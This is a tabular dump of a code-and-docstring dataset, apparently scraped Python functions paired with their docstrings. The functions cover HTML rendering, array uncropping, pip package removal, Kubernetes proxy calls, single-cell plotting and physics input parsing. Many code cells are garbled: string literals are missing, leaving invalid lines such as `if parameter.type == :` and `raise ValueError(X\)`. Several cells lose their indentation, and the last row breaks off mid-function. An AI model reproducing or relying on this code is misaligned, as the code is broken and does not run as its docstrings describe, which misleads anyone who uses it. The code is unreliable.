Unnamed: 0 (int64, 0–389k) | code (string, lengths 26–79.6k) | docstring (string, lengths 1–46.9k)
---|---|---
11,100 | def block_html(self, html):
    if self.options.get('skip_style') and \
            html.lower().startswith('<style'):
        return ''
    if self.options.get('escape'):
        return escape(html)
    return html | Rendering block level pure html content.
:param html: text content of the html snippet. |
11,101 | def run_single_with_display(wf, display):
S = Scheduler(error_handler=display.error_handler)
W = Queue() \
>> branch(log_job_start.to(sink_map(display))) \
>> worker \
>> branch(sink_map(display))
return S.run(W, get_workflow(wf)) | Adds a display to the single runner. Everything still runs in a single
thread. Every time a job is pulled by the worker, a message goes to the
display routine; when the job is finished the result is sent to the display
routine. |
11,102 | def uncrop(data, crinfo, orig_shape, resize=False, outside_mode="constant", cval=0):
if crinfo is None:
crinfo = list(zip([0] * data.ndim, orig_shape))
elif np.asarray(crinfo).size == data.ndim:
crinfo = list(zip(crinfo, np.asarray(crinfo) + data.shape))
crinfo = fix_crinfo(crinfo)
data_out = np.ones(orig_shape, dtype=data.dtype) * cval
if resize:
data = resize_to_shape(data, crinfo[:, 1] - crinfo[:, 0])
startx = np.round(crinfo[0][0]).astype(int)
starty = np.round(crinfo[1][0]).astype(int)
startz = np.round(crinfo[2][0]).astype(int)
data_out[
startx : startx + data.shape[0],
starty : starty + data.shape[1],
startz : startz + data.shape[2],
] = data
if outside_mode == "nearest":
for ax in range(data.ndim):
start = np.round(crinfo[ax][0]).astype(int)
slices = [slice(None), slice(None), slice(None)]
slices[ax] = start
repeated_slice = np.expand_dims(data_out[slices], ax)
append_sz = start
if append_sz > 0:
tile0 = np.repeat(repeated_slice, append_sz, axis=ax)
slices = [slice(None), slice(None), slice(None)]
slices[ax] = slice(None, start)
data_out[slices] = tile0
start = np.round(crinfo[ax][0]).astype(int)
slices = [slice(None), slice(None), slice(None)]
slices[ax] = start + data.shape[ax] - 1
repeated_slice = np.expand_dims(data_out[slices], ax)
append_sz = data_out.shape[ax] - (start + data.shape[ax])
if append_sz > 0:
tile0 = np.repeat(repeated_slice, append_sz, axis=ax)
slices = [slice(None), slice(None), slice(None)]
slices[ax] = slice(start + data.shape[ax], None)
data_out[slices] = tile0
    return data_out | Place the cropped data back into an array of the original shape (the inverse of a crop).
:param data: input data
:param crinfo: array with minimum and maximum index along each axis
[[minX, maxX],[minY, maxY],[minZ, maxZ]]. If crinfo is None, the whole input image is placed into [0, 0, 0].
If crinfo is just series of three numbers, it is used as an initial point for input image placement.
:param orig_shape: shape of uncropped image
:param resize: True or False (default). Useful if data.shape does not fit the crinfo shape.
:param outside_mode: 'constant', 'nearest'
:return: uncropped data with shape `orig_shape` |
11,103 | def create_regular_expression(self, regexp):
for parameter in self.situation_context.situation_parameters:
if parameter.type == :
return self.add_parameter_value(
,
**{: parameter.href,
: regexp})
raise CreateElementFailed(
) | Create a regular expression for this inspection situation
context. The inspection situation must be using an inspection
context that supports regex.
:param str regexp: regular expression string
:raises CreateElementFailed: failed to modify the situation |
11,104 | def getfqdn(name=''):
    name = name.strip()
    if not name or name == '0.0.0.0':
        name = gethostname()
    try:
        hostname, aliases, ipaddrs = gethostbyaddr(name)
    except error:
        pass
    else:
        aliases.insert(0, hostname)
        for name in aliases:
            if '.' in name:
                break
        else:
            name = hostname
return name | Get fully qualified domain name from name.
An empty argument is interpreted as meaning the local host.
First the hostname returned by gethostbyaddr() is checked, then
possibly existing aliases. In case no FQDN is available, hostname
from gethostname() is returned. |
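A short usage sketch; this function mirrors the standard library's `socket.getfqdn`:

```python
getfqdn()             # FQDN of the local host (empty argument means "local host")
getfqdn("127.0.0.1")  # typically 'localhost' or the host's canonical name
```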
11,105 | def object(self, o_type, o_name=None):
o_found = self._get_object(o_type=o_type, o_name=o_name)
if not o_found:
return {: u, : u % o_type}
return o_found | Get an object from the scheduler.
The result is a serialized object which is a Json structure containing:
- content: the serialized object content
- __sys_python_module__: the python class of the returned object
The Alignak unserialize function of the alignak.misc.serialization package allows
to restore the initial object.
.. code-block:: python
from alignak.misc.serialization import unserialize
from alignak.objects.hostgroup import Hostgroup
raw_data = req.get("http://127.0.0.1:7768/object/hostgroup/allhosts")
print("Got: %s / %s" % (raw_data.status_code, raw_data.content))
assert raw_data.status_code == 200
object = raw_data.json()
group = unserialize(object, True)
assert group.__class__ == Hostgroup
assert group.get_name() == 'allhosts'
As an example:
{
"__sys_python_module__": "alignak.objects.hostgroup.Hostgroup",
"content": {
"uuid": "32248642-97dd-4f39-aaa2-5120112a765d",
"name": "",
"hostgroup_name": "allhosts",
"use": [],
"tags": [],
"alias": "All Hosts",
"notes": "",
"definition_order": 100,
"register": true,
"unknown_members": [],
"notes_url": "",
"action_url": "",
"imported_from": "unknown",
"conf_is_correct": true,
"configuration_errors": [],
"configuration_warnings": [],
"realm": "",
"downtimes": {},
"hostgroup_members": [],
"members": [
"553d47bc-27aa-426c-a664-49c4c0c4a249",
"f88093ca-e61b-43ff-a41e-613f7ad2cea2",
"df1e2e13-552d-43de-ad2a-fe80ad4ba979",
"d3d667dd-f583-4668-9f44-22ef3dcb53ad"
]
}
}
:param o_type: searched object type
:type o_type: str
:param o_name: searched object name (or uuid)
:type o_name: str
:return: serialized object information
:rtype: str |
11,106 | def add_mod(self, seq, mod):
modstr = self.value(mod)
    if modstr == '~':
        seq.parser_tree = parsing.Complement(seq.parser_tree)
    elif modstr == '!!':
        seq.parser_tree = parsing.LookAhead(seq.parser_tree)
    elif modstr == '!':
        seq.parser_tree = parsing.Neg(seq.parser_tree)
    elif modstr == '->':
        seq.parser_tree = parsing.Until(seq.parser_tree)
return True | Create a tree.{Complement, LookAhead, Neg, Until} |
11,107 | def _setup_metric_group_values(self):
mg_defs = self._metrics_context.metric_group_definitions
metric_group_name = None
resource_uri = None
dt_timestamp = None
object_values = None
metric_group_values = list()
state = 0
for mr_line in self._metrics_response_str.splitlines():
if state == 0:
if object_values is not None:
mgv = MetricGroupValues(metric_group_name, object_values)
metric_group_values.append(mgv)
object_values = None
            if mr_line == '':
pass
else:
metric_group_name = mr_line.strip()
assert metric_group_name in mg_defs
m_defs = mg_defs[metric_group_name].metric_definitions
object_values = list()
state = 1
elif state == 1:
            if mr_line == '':
state = 0
else:
resource_uri = mr_line.strip()
state = 2
elif state == 2:
            assert mr_line != ''
try:
dt_timestamp = datetime_from_timestamp(int(mr_line))
except ValueError:
dt_timestamp = datetime.now(pytz.utc)
state = 3
elif state == 3:
            if mr_line != '':
str_values = mr_line.split()
metrics = dict()
for m_name in m_defs:
m_def = m_defs[m_name]
m_type = m_def.type
m_value_str = str_values[m_def.index]
m_value = _metric_value(m_value_str, m_type)
metrics[m_name] = m_value
ov = MetricObjectValues(
self._client, mg_defs[metric_group_name], resource_uri,
dt_timestamp, metrics)
object_values.append(ov)
else:
state = 1
return metric_group_values | Return the list of MetricGroupValues objects for this metrics response,
by processing its metrics response string.
The lines in the metrics response string are::
MetricsResponse: MetricsGroup{0,*}
<emptyline> a third empty line at the end
MetricsGroup: MetricsGroupName
ObjectValues{0,*}
<emptyline> a second empty line after each MG
ObjectValues: ObjectURI
Timestamp
ValueRow{1,*}
<emptyline> a first empty line after this blk |
11,108 | def project_from_files(
files, func_wrapper=_astroid_wrapper, project_name="no name", black_list=("CVS",)
):
astroid_manager = manager.AstroidManager()
project = Project(project_name)
for something in files:
if not os.path.exists(something):
fpath = modutils.file_from_modpath(something.split("."))
elif os.path.isdir(something):
fpath = os.path.join(something, "__init__.py")
else:
fpath = something
ast = func_wrapper(astroid_manager.ast_from_file, fpath)
if ast is None:
continue
project.path = project.path or ast.file
project.add_module(ast)
base_name = ast.name
if ast.package and something.find("__init__") == -1:
for fpath in modutils.get_module_files(
os.path.dirname(ast.file), black_list
):
ast = func_wrapper(astroid_manager.ast_from_file, fpath)
if ast is None or ast.name == base_name:
continue
project.add_module(ast)
return project | return a Project from a list of files or modules |
11,109 | def upload_file_handle(
self,
bucket: str,
key: str,
src_file_handle: typing.BinaryIO,
content_type: str=None,
metadata: dict=None):
raise NotImplementedError() | Saves the contents of a file handle as the contents of an object in a bucket. |
11,110 | def uninstall(self, package):
if isinstance(package, tuple):
        package = '=='.join(package)
    if not self.is_installed(package):
        self._write_to_log('%s is not installed, skipping' % package)
        return
    try:
        self._execute_pip(['uninstall', '-y', package])
except subprocess.CalledProcessError as e:
raise PackageRemovalException((e.returncode, e.output, package)) | Uninstalls the given package (given in pip's package syntax or a tuple of
('name', 'ver')) from this virtual environment. |
11,111 | def delete(args):
m = TemplateManager(args.hosts)
m.delete(args.name) | Delete a template by name |
11,112 | def _scatter_obs(
adata,
x=None,
y=None,
color=None,
use_raw=None,
        layers='X',
sort_order=True,
alpha=None,
basis=None,
groups=None,
components=None,
        projection='2d',
        legend_loc='right margin',
legend_fontsize=None,
legend_fontweight=None,
color_map=None,
palette=None,
frameon=None,
right_margin=None,
left_margin=None,
size=None,
title=None,
show=None,
save=None,
ax=None):
sanitize_anndata(adata)
from scipy.sparse import issparse
if use_raw is None and adata.raw is not None: use_raw = True
if layers is None:
        layers = 'X'
    if isinstance(layers, str) and (layers == 'X' or layers in adata.layers.keys()):
layers = (layers, layers, layers)
elif isinstance(layers, (tuple, list)) and len(layers) == 3:
for layer in layers:
if layer not in adata.layers.keys() and layer != :
raise ValueError(
X\)
else:
raise ValueError()
if use_raw and (layers != (, , ) or layers != [, , ]):
ValueError(X\)
if legend_loc not in VALID_LEGENDLOCS:
raise ValueError(
.format(VALID_LEGENDLOCS))
    if components is None: components = '1,2,3' if '3d' in projection else '1,2'
    if isinstance(components, str): components = components.split(',')
components = np.array(components).astype(int) - 1
keys = [] if color is None else [color] if isinstance(color, str) else color
if title is not None and isinstance(title, str):
title = [title]
    highlights = adata.uns['highlights'] if 'highlights' in adata.uns else []
if basis is not None:
try:
            if basis == 'diffmap': components += 1
            Y = adata.obsm['X_' + basis][:, components]
            if basis == 'diffmap': components -= 1
except KeyError:
raise KeyError(
.format(basis))
elif x is not None and y is not None:
x_arr = adata._get_obs_array(x, use_raw=use_raw, layer=layers[0])
y_arr = adata._get_obs_array(y, use_raw=use_raw, layer=layers[1])
x_arr = x_arr.toarray().flatten() if issparse(x_arr) else x_arr
y_arr = y_arr.toarray().flatten() if issparse(y_arr) else y_arr
Y = np.c_[x_arr[:, None], y_arr[:, None]]
else:
raise ValueError()
if size is None:
n = Y.shape[0]
size = 120000 / n
if legend_loc.startswith() and legend_fontsize is None:
legend_fontsize = rcParams[]
elif legend_fontsize is None:
legend_fontsize = rcParams[]
palette_was_none = False
if palette is None: palette_was_none = True
if isinstance(palette, list):
if not is_color_like(palette[0]):
palettes = palette
else:
palettes = [palette]
else:
palettes = [palette for i in range(len(keys))]
for i, palette in enumerate(palettes):
palettes[i] = utils.default_palette(palette)
if basis is not None:
component_name = (
if basis ==
else if basis ==
else if basis ==
else if basis ==
else basis.replace(, ).upper() if in basis
else basis)
else:
component_name = None
axis_labels = (x, y) if component_name is None else None
show_ticks = True if component_name is None else False
color_ids = []
categoricals = []
colorbars = []
for ikey, key in enumerate(keys):
c =
categorical = False
colorbar = None
if key in adata.obs_keys():
if is_categorical_dtype(adata.obs[key]):
categorical = True
else:
c = adata.obs[key]
elif (use_raw
and adata.raw is not None
and key in adata.raw.var_names):
c = adata.raw[:, key].X
elif key in adata.var_names:
c = adata[:, key].X if layers[2] == else adata[:, key].layers[layers[2]]
c = c.toarray().flatten() if issparse(c) else c
elif is_color_like(key):
c = key
colorbar = False
else:
raise ValueError(
{}\
.format(key, adata.obs_keys(), adata.var_names))
if colorbar is None:
colorbar = not categorical
colorbars.append(colorbar)
if categorical: categoricals.append(ikey)
color_ids.append(c)
if right_margin is None and len(categoricals) > 0:
if legend_loc == : right_margin = 0.5
if title is None and keys[0] is not None:
title = [key.replace(, ) if not is_color_like(key) else for key in keys]
axs = scatter_base(Y,
title=title,
alpha=alpha,
component_name=component_name,
axis_labels=axis_labels,
component_indexnames=components + 1,
projection=projection,
colors=color_ids,
highlights=highlights,
colorbars=colorbars,
right_margin=right_margin,
left_margin=left_margin,
sizes=[size for c in keys],
color_map=color_map,
show_ticks=show_ticks,
ax=ax)
def add_centroid(centroids, name, Y, mask):
Y_mask = Y[mask]
if Y_mask.shape[0] == 0: return
median = np.median(Y_mask, axis=0)
i = np.argmin(np.sum(np.abs(Y_mask - median), axis=1))
centroids[name] = Y_mask[i]
for i, ikey in enumerate(categoricals):
palette = palettes[i]
key = keys[ikey]
utils.add_colors_for_categorical_sample_annotation(
adata, key, palette, force_update_colors=not palette_was_none)
mask_remaining = np.ones(Y.shape[0], dtype=bool)
centroids = {}
if groups is None:
for iname, name in enumerate(adata.obs[key].cat.categories):
if name not in settings.categories_to_ignore:
mask = scatter_group(axs[ikey], key, iname,
adata, Y, projection, size=size, alpha=alpha)
mask_remaining[mask] = False
if legend_loc.startswith(): add_centroid(centroids, name, Y, mask)
else:
groups = [groups] if isinstance(groups, str) else groups
for name in groups:
if name not in set(adata.obs[key].cat.categories):
raise ValueError( + name +
+
+ str(adata.obs[key].cat.categories))
else:
iname = np.flatnonzero(adata.obs[key].cat.categories.values == name)[0]
mask = scatter_group(axs[ikey], key, iname,
adata, Y, projection, size=size, alpha=alpha)
if legend_loc.startswith(): add_centroid(centroids, name, Y, mask)
mask_remaining[mask] = False
if mask_remaining.sum() > 0:
data = [Y[mask_remaining, 0], Y[mask_remaining, 1]]
if projection == : data.append(Y[mask_remaining, 2])
axs[ikey].scatter(*data, marker=, c=, s=size,
edgecolors=, zorder=-1)
legend = None
if legend_loc.startswith():
if legend_fontweight is None:
legend_fontweight =
for name, pos in centroids.items():
axs[ikey].text(pos[0], pos[1], name,
weight=legend_fontweight,
verticalalignment=,
horizontalalignment=,
fontsize=legend_fontsize)
all_pos = np.zeros((len(adata.obs[key].cat.categories), 2))
for iname, name in enumerate(adata.obs[key].cat.categories):
if name in centroids:
all_pos[iname] = centroids[name]
else:
all_pos[iname] = [np.nan, np.nan]
utils._tmp_cluster_pos = all_pos
if legend_loc == :
filename = settings.writedir +
logg.msg(.format(filename), v=1)
if settings.writedir != and not os.path.exists(settings.writedir):
os.makedirs(settings.writedir)
np.savetxt(filename, all_pos, delimiter=)
elif legend_loc == :
legend = axs[ikey].legend(
frameon=False, loc=,
bbox_to_anchor=(1, 0.5),
ncol=(1 if len(adata.obs[key].cat.categories) <= 14
else 2 if len(adata.obs[key].cat.categories) <= 30 else 3),
fontsize=legend_fontsize)
elif legend_loc != :
legend = axs[ikey].legend(
frameon=False, loc=legend_loc, fontsize=legend_fontsize)
if legend is not None:
for handle in legend.legendHandles: handle.set_sizes([300.0])
frameon = settings._frameon if frameon is None else frameon
if not frameon and x is None and y is None:
for ax in axs:
ax.set_xlabel()
ax.set_ylabel()
ax.set_frame_on(False)
utils.savefig_or_show( if basis is None else basis, show=show, save=save)
if show == False: return axs if len(keys) > 1 else axs[0] | See docstring of scatter. |
11,113 | def pkg_config_libdirs(packages):
    import subprocess
    libdirs = []
    # Collect the -L entries that pkg-config reports for the given packages.
    for token in subprocess.check_output(["pkg-config", "--libs-only-L"] + list(packages)).decode().split():
        if token.startswith("-L"):
            libdirs.append(token[2:])
    return libdirs | Returns a list of all library paths that pkg-config says should be included when
linking against the list of packages given as 'packages'. An empty return list means
that the package may be found in the standard system locations, irrespective of
pkg-config. |
11,114 | def children(self):
for c in self.table.columns:
if c.parent == self.name and not c.valuetype_class.is_label():
            yield c | Return the table's other columns that have this column as a parent, excluding labels |
11,115 | def format_lines(statements, lines):
pairs = []
i = 0
j = 0
start = None
statements = sorted(statements)
lines = sorted(lines)
while i < len(statements) and j < len(lines):
if statements[i] == lines[j]:
if start == None:
start = lines[j]
end = lines[j]
j += 1
elif start:
pairs.append((start, end))
start = None
i += 1
if start:
pairs.append((start, end))
    ret = ', '.join(map(nice_pair, pairs))
return ret | Nicely format a list of line numbers.
Format a list of line numbers for printing by coalescing groups of lines as
long as the lines represent consecutive statements. This will coalesce
even if there are gaps between statements.
For example, if `statements` is [1,2,3,4,5,10,11,12,13,14] and
`lines` is [1,2,5,10,11,13,14] then the result will be "1-2, 5-11, 13-14". |
11,116 | def stage_config(self):
def get_stage_setting(stage, extended_stages=None):
if extended_stages is None:
extended_stages = []
if stage in extended_stages:
raise RuntimeError(stage + " has already been extended to these settings. "
"There is a circular extends within the settings file.")
extended_stages.append(stage)
try:
stage_settings = dict(self.zappa_settings[stage].copy())
except KeyError:
            raise ClickException("Cannot extend settings for undefined stage '" + stage + "'")
        extends_stage = self.zappa_settings[stage].get('extends', None)
if not extends_stage:
return stage_settings
extended_settings = get_stage_setting(stage=extends_stage, extended_stages=extended_stages)
extended_settings.update(stage_settings)
return extended_settings
settings = get_stage_setting(stage=self.api_stage)
    if u'delete_zip' in settings:
        settings[u'delete_local_zip'] = settings.get(u'delete_zip')
settings.update(self.stage_config_overrides)
return settings | A shortcut property for settings of a stage. |
11,117 | def _len_objid(self):
try:
return self._size
except AttributeError:
temp = (self.object_id, self.birth_vol_id, self.birth_object_id, self.birth_domain_id)
self._size = sum([ObjectID._UUID_SIZE for data in temp if data is not None])
return self._size | Get the actual size of the content, as some attributes have variable sizes |
11,118 | def _update_progress(self, percentage, **kwargs):
if self._show_progressbar:
if self._progressbar is None:
self._initialize_progressbar()
self._progressbar.update(percentage * 10000)
if self._progress_callback is not None:
self._progress_callback(percentage, **kwargs) | Update the progress with a percentage, including updating the progressbar as well as calling the progress
callback.
:param float percentage: Percentage of the progressbar. from 0.0 to 100.0.
:param kwargs: Other parameters that will be passed to the progress_callback handler.
:return: None |
11,119 | def create_channel(
self, name, values=None, *, shape=None, units=None, dtype=None, **kwargs
) -> Channel:
if name in self.channel_names:
warnings.warn(name, wt_exceptions.ObjectExistsWarning)
return self[name]
elif name in self.variable_names:
raise wt_exceptions.NameNotUniqueError(name)
require_kwargs = {"chunks": True}
if values is None:
if shape is None:
require_kwargs["shape"] = self.shape
else:
require_kwargs["shape"] = shape
if dtype is None:
require_kwargs["dtype"] = np.dtype(np.float64)
else:
require_kwargs["dtype"] = dtype
if require_kwargs["dtype"].kind in "fcmM":
require_kwargs["fillvalue"] = np.nan
else:
require_kwargs["fillvalue"] = 0
else:
require_kwargs["data"] = values
require_kwargs["shape"] = values.shape
require_kwargs["dtype"] = values.dtype
if np.prod(require_kwargs["shape"]) == 1:
require_kwargs["chunks"] = None
dataset_id = self.require_dataset(name=name, **require_kwargs).id
channel = Channel(self, dataset_id, units=units, **kwargs)
self.attrs["channel_names"] = np.append(self.attrs["channel_names"], name.encode())
return channel | Append a new channel.
Parameters
----------
name : string
Unique name for this channel.
values : array (optional)
Array. If None, an empty array equaling the data shape is
created. Default is None.
shape : tuple of int
Shape to use. Must broadcast with the full shape.
Only used if `values` is None.
Default is the full shape of self.
units : string (optional)
Channel units. Default is None.
dtype : numpy.dtype (optional)
dtype to use for dataset, default is np.float64.
Only used if `values` is None.
kwargs : dict
Additional keyword arguments passed to Channel instantiation.
Returns
-------
Channel
Created channel. |
11,120 | def choose(n, k):
if 0 <= k <= n:
ntok = 1
ktok = 1
for t in xrange(1, min(k, n - k) + 1):
ntok *= n
ktok *= t
n -= 1
return ntok // ktok
else:
return 0 | A fast way to calculate binomial coefficients by Andrew Dalke (contrib). |
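A quick illustration of the function above (plain Python, no dependencies):

```python
choose(5, 2)    # -> 10
choose(52, 5)   # -> 2598960, the number of 5-card poker hands
choose(3, 7)    # -> 0, since k is outside the range 0..n
```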
11,121 | def added_env_paths(env_vars, env=None):
if not env_vars:
return None
if not env:
env = dict(os.environ)
result = dict(env)
for env_var, paths in env_vars.items():
separator = paths[0]
paths = paths[1:]
current = env.get(env_var, "")
current = [x for x in current.split(separator) if x]
added = 0
for path in paths.split(separator):
if path not in current:
added += 1
current.append(path)
if added:
result[env_var] = separator.join(current)
return result | :param dict|None env_vars: Env vars to customize
:param dict env: Original env vars |
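A minimal usage sketch derived from the code above; each value starts with the separator character, followed by the paths to append (the "PATH" entry here is only an illustration):

```python
env = added_env_paths({"PATH": ":/opt/tools/bin:/usr/local/bin"})
# 'env' is a copy of os.environ with any missing paths appended to PATH;
# paths already present are left untouched, and None is returned if env_vars is falsy.
```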
11,122 | def connect_put_namespaced_service_proxy_with_path(self, name, namespace, path, **kwargs):
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
return self.connect_put_namespaced_service_proxy_with_path_with_http_info(name, namespace, path, **kwargs)
else:
(data) = self.connect_put_namespaced_service_proxy_with_path_with_http_info(name, namespace, path, **kwargs)
return data | connect_put_namespaced_service_proxy_with_path # noqa: E501
connect PUT requests to proxy of Service # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.connect_put_namespaced_service_proxy_with_path(name, namespace, path, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: name of the ServiceProxyOptions (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str path: path to the resource (required)
:param str path2: Path is the part of URLs that include service endpoints, suffixes, and parameters to use for the current proxy request to service. For example, the whole request URL is http://localhost/api/v1/namespaces/kube-system/services/elasticsearch-logging/_search?q=user:kimchy. Path is _search?q=user:kimchy.
:return: str
If the method is called asynchronously,
returns the request thread. |
11,123 | def role_exists(role, **kwargs):
    return len(tsql_query(query='sp_helprole {0}'.format(role), as_dict=True, **kwargs)) == 1 | Checks if a role exists.
CLI Example:
.. code-block:: bash
salt minion mssql.role_exists db_owner |
11,124 | def list_authors():
authors = Author.query.all()
    content = ''
    for author in authors:
        content += '%s\n' % author.name
return content | List all authors.
e.g.: GET /authors |
11,125 | def poisson_equation(image, gradient=1, max_iter=100, convergence=.01, percentile = 90.0):
pe = np.zeros((image.shape[0]+2, image.shape[1]+2))
if image.shape[0] > 64 and image.shape[1] > 64:
sub_image = image[::2, ::2]
sub_pe = poisson_equation(sub_image,
gradient=gradient*2,
max_iter=max_iter,
convergence=convergence)
coordinates = np.mgrid[0:(sub_pe.shape[0]*2),
0:(sub_pe.shape[1]*2)].astype(float) / 2
pe[1:(sub_image.shape[0]*2+1), 1:(sub_image.shape[1]*2+1)] = \
scind.map_coordinates(sub_pe, coordinates, order=1)
pe[:image.shape[0], :image.shape[1]][~image] = 0
else:
pe[1:-1,1:-1] = image
i, j = np.mgrid[0:pe.shape[0], 0:pe.shape[1]]
mask = (i>0) & (i<pe.shape[0]-1) & (j>0) & (j<pe.shape[1]-1)
mask[mask] = image[i[mask]-1, j[mask]-1]
i = i[mask]
j = j[mask]
if len(i) == 0:
return pe[1:-1, 1:-1]
if len(i) == 1:
pe[mask] = 1
return pe[1:-1, 1:-1]
for itr in range(max_iter):
next_pe = (pe[i+1, j] + pe[i-1, j] + pe[i, j+1] + pe[i, j-1]) / 4 + 1
difference = np.abs((pe[mask] - next_pe) / next_pe)
pe[mask] = next_pe
if np.percentile(difference, percentile) <= convergence:
break
return pe[1:-1, 1:-1] | Estimate the solution to the Poisson Equation
The Poisson Equation is the solution to gradient(x) = h^2/4 and, in this
context, we use a boundary condition where x is zero for background
pixels. Also, we set h^2/4 = 1 to indicate that each pixel is a distance
of 1 from its neighbors.
The estimation exits after max_iter iterations or if the given percentile
of foreground pixels differ by less than the convergence fraction
from one pass to the next.
Some ideas taken from Gorelick, "Shape representation and classification
using the Poisson Equation", IEEE Transactions on Pattern Analysis and
Machine Intelligence V28, # 12, 2006
image - binary image with foreground as True
gradient - the target gradient between 4-adjacent pixels
max_iter - maximum # of iterations at a given level
convergence - target fractional difference between values from previous
and next pass
percentile - measure convergence at this percentile |
11,126 | def apply_parameters(self, parameters):
class SafeString(object):
def __init__(self, s):
self.string = s
def __repr__(self):
return "{" + self.string + "}"
def __str__(self):
return "{" + self.string + "}"
def __getitem__(self, item):
return SafeString(self.string + "[" + item + "]")
class SafeDict(dict):
def __missing__(self, key):
return SafeString(key)
formatter = string.Formatter()
ds_formatter = string.Formatter()
def ds_format_field(value, spec):
ds_format_field.last = value
return ""
ds_formatter.format_field = ds_format_field
params = SafeDict(parameters)
def _recursive_apply(item):
if isinstance(item, basestring):
if item.startswith("{$REPLACE") and item.endswith("}"):
try:
ds_formatter.vformat("{" + item[10:-1] + "}", (), parameters)
except KeyError:
return None
return copy.deepcopy(ds_formatter.format_field.last)
else:
return formatter.vformat(item, (), params)
if isinstance(item, dict):
return {
_recursive_apply(key): _recursive_apply(value)
for key, value in item.items()
}
if isinstance(item, tuple):
return tuple(_recursive_apply(list(item)))
if isinstance(item, list):
return [_recursive_apply(x) for x in item]
return item
self.recipe = _recursive_apply(self.recipe) | Recursively apply dictionary entries in 'parameters' to {item}s in recipe
structure, leaving undefined {item}s as they are. A special case is a
{$REPLACE:item}, which replaces the string with a copy of the referenced
parameter item.
Examples:
parameters = { 'x':'5' }
apply_parameters( { '{x}': '{y}' }, parameters )
=> { '5': '{y}' }
parameters = { 'y':'5' }
apply_parameters( { '{x}': '{y}' }, parameters )
=> { '{x}': '5' }
parameters = { 'x':'3', 'y':'5' }
apply_parameters( { '{x}': '{y}' }, parameters )
=> { '3': '5' }
parameters = { 'l': [ 1, 2 ] }
apply_parameters( { 'x': '{$REPLACE:l}' }, parameters )
=> { 'x': [ 1, 2 ] } |
11,127 | def _compute_sources_for_target(self, target):
def resolve_target_sources(target_sources):
resolved_sources = []
for tgt in target_sources:
if tgt.has_sources():
resolved_sources.extend(tgt.sources_relative_to_buildroot())
return resolved_sources
sources = [s for s in target.sources_relative_to_buildroot() if self._sources_predicate(s)]
    if hasattr(target, 'java_sources') and target.java_sources:
sources.extend(resolve_target_sources(target.java_sources))
return sources | Computes and returns the sources (relative to buildroot) for the given target. |
11,128 | def from_string(string):
lines = list(clean_lines(string.splitlines()))
def input_mode(line):
if line[0] == "&":
return ("sections", line[1:].lower())
elif "ATOMIC_SPECIES" in line:
return ("pseudo", )
elif "K_POINTS" in line:
return ("kpoints", line.split("{")[1][:-1])
elif "CELL_PARAMETERS" in line or "ATOMIC_POSITIONS" in line:
return ("structure", line.split("{")[1][:-1])
elif line == "/":
return None
else:
return mode
sections = {"control": {}, "system": {}, "electrons": {},
"ions": {}, "cell":{}}
pseudo = {}
pseudo_index = 0
lattice = []
species = []
coords = []
structure = None
site_properties = {"pseudo":[]}
mode = None
for line in lines:
mode = input_mode(line)
if mode == None:
pass
elif mode[0] == "sections":
section = mode[1]
m = re.match(r, line)
if m:
key = m.group(1).strip()
key_ = m.group(2).strip()
val = m.group(3).strip()
if key_ != "":
if sections[section].get(key, None) == None:
val_ = [0.0]*20
val_[int(key_)-1] = PWInput.proc_val(key, val)
sections[section][key] = val_
site_properties[key] = []
else:
sections[section][key][int(key_)-1] = PWInput.proc_val(key, val)
else:
sections[section][key] = PWInput.proc_val(key, val)
elif mode[0] == "pseudo":
m = re.match(r, line)
if m:
pseudo[m.group(1).strip()] = {}
pseudo[m.group(1).strip()]["index"] = pseudo_index
pseudo[m.group(1).strip()]["pseudopot"] = m.group(3).strip()
pseudo_index += 1
elif mode[0] == "kpoints":
m = re.match(r, line)
if m:
kpoints_grid = (int(m.group(1)), int(m.group(2)), int(m.group(3)))
kpoints_shift = (int(m.group(4)), int(m.group(5)), int(m.group(6)))
else:
kpoints_mode = mode[1]
elif mode[0] == "structure":
m_l = re.match(r, line)
m_p = re.match(r, line)
if m_l:
lattice += [ float(m_l.group(1)), float(m_l.group(2)), float(m_l.group(3)) ]
elif m_p:
site_properties["pseudo"].append(pseudo[m_p.group(1)]["pseudopot"])
species += [pseudo[m_p.group(1)]["pseudopot"].split(".")[0]]
coords += [[float(m_p.group(2)), float(m_p.group(3)), float(m_p.group(4))]]
for k, v in site_properties.items():
if k != "pseudo":
                        site_properties[k].append(sections["system"][k][pseudo[m_p.group(1)]["index"]])
if mode[1] == "angstrom":
coords_are_cartesian = True
elif mode[1] == "crystal":
coords_are_cartesian = False
structure = Structure(Lattice(lattice), species, coords,
coords_are_cartesian=coords_are_cartesian,
site_properties=site_properties)
return PWInput(structure=structure, control=sections["control"],
system=sections["system"], electrons=sections["electrons"],
ions=sections["ions"], cell=sections["cell"], kpoints_mode=kpoints_mode,
kpoints_grid=kpoints_grid, kpoints_shift=kpoints_shift) | Reads an PWInput object from a string.
Args:
string (str): PWInput string
Returns:
PWInput object |
11,129 | def _from_dict(cls, _dict):
args = {}
    if 'tooling' in _dict:
        args['tooling'] = WorkspaceSystemSettingsTooling._from_dict(
            _dict.get('tooling'))
    if 'disambiguation' in _dict:
        args[
            'disambiguation'] = WorkspaceSystemSettingsDisambiguation._from_dict(
                _dict.get('disambiguation'))
    if 'human_agent_assist' in _dict:
        args['human_agent_assist'] = _dict.get('human_agent_assist')
return cls(**args) | Initialize a WorkspaceSystemSettings object from a json dictionary. |
11,130 | def update_settings(self, settings, force=False, timeout=-1):
data = settings.copy()
    if 'ethernetSettings' in data:
        ethernet_default_values = self._get_default_values(self.SETTINGS_ETHERNET_DEFAULT_VALUES)
        data['ethernetSettings'] = merge_resources(data['ethernetSettings'],
                                                   ethernet_default_values)
uri = "{}/settings".format(self.data["uri"])
default_values = self._get_default_values(self.SETTINGS_DEFAULT_VALUES)
data = self._helper.update_resource_fields(data, default_values)
return self._helper.update(data, uri=uri, force=force, timeout=timeout) | Updates interconnect settings on the logical interconnect. Changes to interconnect settings are asynchronously
applied to all managed interconnects.
(This method is not available from API version 600 onwards)
Args:
settings: Interconnect settings
force: If set to true, the operation completes despite any problems with network connectivity or errors
on the resource itself. The default is false.
timeout: Timeout in seconds. Wait for task completion by default. The timeout does not abort the operation
in OneView; it just stops waiting for its completion.
Returns:
dict: Logical Interconnect |
11,131 | def get_html_string(self, **kwargs):
options = self._get_options(kwargs)
if options["format"]:
string = self._get_formatted_html_string(options)
else:
string = self._get_simple_html_string(options)
